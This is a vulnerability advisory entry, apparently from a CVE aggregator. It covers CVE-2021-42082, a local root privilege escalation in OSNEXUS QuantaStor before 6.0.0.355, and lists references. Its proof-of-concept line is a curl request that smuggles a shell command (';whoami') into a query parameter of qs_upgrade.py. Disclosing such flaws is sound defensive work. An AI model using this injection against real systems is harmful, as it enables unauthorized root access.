Unrated severityNVD Advisory· Published Jul 10, 2023· Updated Sep 22, 2025
Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355
CVE-2021-42082
Description
Local users are able to execute scripts under root privileges.
POC
On the local host run the following command:
curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;whoami'
Affected products
1- Range: 0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4- csirt.divd.nl/CVE-2021-42082mitrethird-party-advisorytechnical-descriptionexploit
- csirt.divd.nl/DIVD-2021-00020/mitrethird-party-advisory
- www.wbsec.nl/osnexusmitrethird-party-advisorytechnical-descriptionexploit
- www.osnexus.com/products/software-defined-storagemitreproduct
News mentions
0No linked articles in our index yet.